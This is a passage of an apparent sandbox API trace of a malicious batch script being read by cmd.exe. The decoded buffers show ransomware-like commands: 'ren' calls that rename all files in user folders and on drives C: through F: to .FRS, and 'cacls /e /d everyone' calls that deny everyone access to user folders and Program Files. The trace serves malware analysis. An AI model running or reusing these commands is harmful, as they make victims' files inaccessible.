lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0101.969] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.969] GetFileType (hFile=0x158) returned 0x1 [0101.969] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0101.970] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.970] SetFilePointer (in: hFile=0x158, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0101.970] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0101.970] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0101.970] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.970] GetFileType (hFile=0x158) returned 0x1 [0101.970] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0101.970] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.970] SetFilePointer (in: hFile=0x158, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0101.970] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0101.970] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0101.970] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.970] GetFileType (hFile=0x158) returned 0x1 [0101.970] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0101.970] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.970] SetFilePointer (in: hFile=0x158, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0101.970] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0101.970] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0101.970] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.970] GetFileType (hFile=0x158) returned 0x1 [0101.970] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0101.970] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.970] SetFilePointer (in: hFile=0x158, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0101.971] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0101.971] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0101.971] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.971] GetFileType (hFile=0x158) returned 0x1 [0101.971] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0101.971] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.971] SetFilePointer (in: hFile=0x158, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0101.971] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0101.971] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0101.971] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.971] GetFileType (hFile=0x158) returned 0x1 [0101.971] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0101.971] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.971] SetFilePointer (in: hFile=0x158, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0101.971] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0101.971] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0101.971] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.971] GetFileType (hFile=0x158) returned 0x1 [0101.971] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0101.971] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.971] SetFilePointer (in: hFile=0x158, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0101.971] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0101.971] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0101.971] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.971] GetFileType (hFile=0x158) returned 0x1 [0101.971] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0101.971] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.971] SetFilePointer (in: hFile=0x158, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0101.971] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0101.971] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0101.972] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.972] GetFileType (hFile=0x158) returned 0x1 [0101.972] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0101.972] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.972] SetFilePointer (in: hFile=0x158, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0101.972] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0101.972] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0101.972] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.972] GetFileType (hFile=0x158) returned 0x1 [0101.972] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0101.972] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.972] SetFilePointer (in: hFile=0x158, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0101.972] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0101.972] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0101.972] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.972] GetFileType (hFile=0x158) returned 0x1 [0101.972] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0101.972] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.972] SetFilePointer (in: hFile=0x158, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0101.972] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0101.972] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0101.972] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.972] GetFileType (hFile=0x158) returned 0x1 [0101.972] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0101.972] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.972] SetFilePointer (in: hFile=0x158, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0101.972] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0101.972] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0101.972] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.972] GetFileType (hFile=0x158) returned 0x1 [0101.972] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0101.973] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.973] SetFilePointer (in: hFile=0x158, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0101.973] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0101.973] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0101.973] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.973] GetFileType (hFile=0x158) returned 0x1 [0101.973] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0101.973] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.973] SetFilePointer (in: hFile=0x158, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0101.973] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0101.973] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0101.973] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.973] GetFileType (hFile=0x158) returned 0x1 [0101.973] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0101.973] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.973] SetFilePointer (in: hFile=0x158, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0101.973] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0101.973] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0101.973] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.973] GetFileType (hFile=0x158) returned 0x1 [0101.973] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0101.973] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.973] SetFilePointer (in: hFile=0x158, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0101.973] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0101.973] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0101.973] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.973] GetFileType (hFile=0x158) returned 0x1 [0101.973] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0101.973] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.973] SetFilePointer (in: hFile=0x158, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0101.974] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0101.974] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0101.974] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.974] GetFileType (hFile=0x158) returned 0x1 [0101.974] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0101.974] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.974] SetFilePointer (in: hFile=0x158, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0101.974] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0101.974] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0101.974] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.974] GetFileType (hFile=0x158) returned 0x1 [0101.974] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0101.974] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.974] SetFilePointer (in: hFile=0x158, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0101.974] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0101.974] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0101.974] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.974] GetFileType (hFile=0x158) returned 0x1 [0101.974] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0101.974] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.974] SetFilePointer (in: hFile=0x158, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0101.974] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0101.974] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0101.974] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.974] GetFileType (hFile=0x158) returned 0x1 [0101.974] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0101.974] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.974] SetFilePointer (in: hFile=0x158, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0101.974] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0101.974] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0101.975] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.975] GetFileType (hFile=0x158) returned 0x1 [0101.975] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0101.975] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.975] SetFilePointer (in: hFile=0x158, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0101.975] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0101.975] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0101.975] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.975] GetFileType (hFile=0x158) returned 0x1 [0101.975] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0101.975] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.975] SetFilePointer (in: hFile=0x158, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0101.975] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0101.975] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0101.975] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.975] GetFileType (hFile=0x158) returned 0x1 [0101.975] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0101.975] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, 